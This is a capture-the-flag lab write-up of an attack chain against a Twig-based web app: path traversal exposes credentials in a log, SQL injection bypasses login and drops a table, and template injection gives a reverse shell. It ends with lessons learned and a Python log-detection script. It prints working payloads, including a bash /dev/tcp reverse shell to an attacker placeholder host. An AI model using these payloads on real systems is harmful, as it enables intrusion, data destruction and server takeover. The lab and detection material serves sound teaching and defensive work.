This lab demonstrates a full attack chain combining SQL injection, insecure credential handling, and server-side template injection in a Twig-based application.
For a detailed video walkthrough, you can watch the full demonstration on my YouTube channel.
A structured lab-based security assessment report is also available here.
Initial full port scan:
nmap -sC -sV -vv 10.10.189.106
Key findings:
22/tcp - OpenSSH
80/tcp - HTTP (Apache)
No additional exposed services.
Given limited attack surface, focus shifted entirely to the web application.
Directory brute-forcing:
gobuster dir -u http://IPADDRESS/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
dirsearch -u http://IPADDRESS
Interesting findings:
/flags
/composer.json
Inspecting composer.json revealed:
"twig/twig": "2.14.0"
This is important because Twig 2.x is known to allow SSTI if user input is rendered insecurely.
Further manual inspection and fuzzing led to discovery of:
/mail.log
Using path traversal techniques:
../../../mail.log
The log contained:
Developer credentials
Superadmin credentials
Information about credential reset behavior triggered when the users table is dropped
This reduced attack complexity significantly.
⚠️ From an attacker's perspective:
Plaintext credentials + internal logic disclosure = major recon advantage.
Login endpoint
Intercepted request in Burp:
Testing classic auth bypass payloads:
' OR 1=1-- -
' || 1=1-- -
Authentication bypass
Access to DEV dashboard
Ability to manipulate users table
Dropping the table:
23;DROP TABLE users;
Triggered system behavior that restored default credentials (as revealed in mail.log).
This allowed login as:
superadmin@injectics.thm
THM{INJECTICS_ADMIN_PANEL_007}
Earlier reconnaissance revealed Twig usage.
Testing SSTI via profile update field:
Basic detection payload:
{{2*2}}
Response: 4, confirming template execution.
Listener started:
nc -lnvp 4444
Twig RCE payload:
{{ ["bash -c 'exec bash -i >& /dev/tcp/ATTACKBOXIP/4445 0>&1'", ""] | sort('passthru') }}
Successful reverse shell established.
Post-exploitation:
ls -la
cd flags
THM{5735172b6c147f4dd649872f73e0fdea}
Individually:
SQL Injection - Critical
Exposed Log File - High
Logic Flaw (Credential Reset) - High
SSTI - Critical
Combined:
SQLi → Table Drop → Credential Restoration → Admin Access → SSTI → RCE
This demonstrates how chaining medium/high vulnerabilities escalates to full system compromise.
Prepared statements are non-negotiable in authentication logic.
Logs must never contain plaintext credentials.
Business logic tied to database state can introduce unexpected escalation paths.
Template engines must never render unsanitized user input.
Defense-in-depth cannot compensate for fundamental injection flaws.
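As an added defender's example (not part of the original writeup), the following Python script classifies request-log lines against the stages of the chain above and flags any source that walks through more than one stage; the log lines, IPs, paths, parameter names and timestamps are constructed, and only the probe shapes come from the writeup.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed Apache-style access-log lines modelling the chain (IPs, paths, parameter
# names and timestamps are assumed; probe values follow the writeup). POST bodies never
# reach the access log, so the login payload is shown as a GET parameter here.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /download.php?file=../../../mail.log HTTP/1.1" 200 812
10.0.0.5 - - [01/Jan/2024:10:00:20 +0000] "GET /login.php?username=%27+OR+1%3D1--+-&password=x HTTP/1.1" 302 0
10.0.0.5 - - [01/Jan/2024:10:01:03 +0000] "GET /dashboard.php?id=23%3BDROP+TABLE+users%3B HTTP/1.1" 200 440
10.0.0.5 - - [01/Jan/2024:10:02:15 +0000] "GET /profile.php?name=%7B%7B2*2%7D%7D HTTP/1.1" 200 1201
10.0.0.5 - - [01/Jan/2024:10:02:40 +0000] "GET /profile.php?name=%7B%7B%5B%22id%22%2C%22%22%5D%7Csort%28%27passthru%27%29%7D%7D HTTP/1.1" 200 1300
10.0.0.9 - - [01/Jan/2024:10:03:00 +0000] "GET /index.php HTTP/1.1" 200 2048
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" \d{3}')

# Chain stage -> pattern applied to the URL-decoded request target.
STAGES = [
    ("traversal",  re.compile(r"\.\./")),
    ("sqli_auth",  re.compile(r"'\s*(?:or|\|\|)\s*1\s*=\s*1", re.I)),
    ("sqli_drop",  re.compile(r";\s*drop\s+table\b", re.I)),
    ("ssti_probe", re.compile(r"\{\{\s*\d+\s*\*\s*\d+\s*\}\}")),
    ("ssti_rce",   re.compile(r"\|\s*sort\s*\(\s*['\"]\w+['\"]\s*\)")),  # string callable handed to a Twig filter
]

def classify(line):
    """Return (ip, stage) for a log line, or None when it matches no stage."""
    m = LINE_RE.match(line)
    if not m:
        return None
    target = unquote_plus(unquote_plus(m.group("target")))  # decode twice: catches double-encoded probes
    for stage, pattern in STAGES:
        if pattern.search(target):
            return m.group("ip"), stage
    return None

def chain_stages(log_text):
    """Map each source IP to the ordered list of distinct stages it touched."""
    seen = defaultdict(list)
    for line in log_text.splitlines():
        hit = classify(line)
        if hit and hit[1] not in seen[hit[0]]:
            seen[hit[0]].append(hit[1])
    return dict(seen)

def alert_ips(log_text, min_stages=2):
    """Sources hitting two or more stages: one stray probe is noise, a sequence is the chain."""
    return sorted(ip for ip, st in chain_stages(log_text).items() if len(st) >= min_stages)
```

Run against a real access log the same way, but feed the login stage from a request-body log, since the writeup's bypass was sent in a POST body that the access log never records.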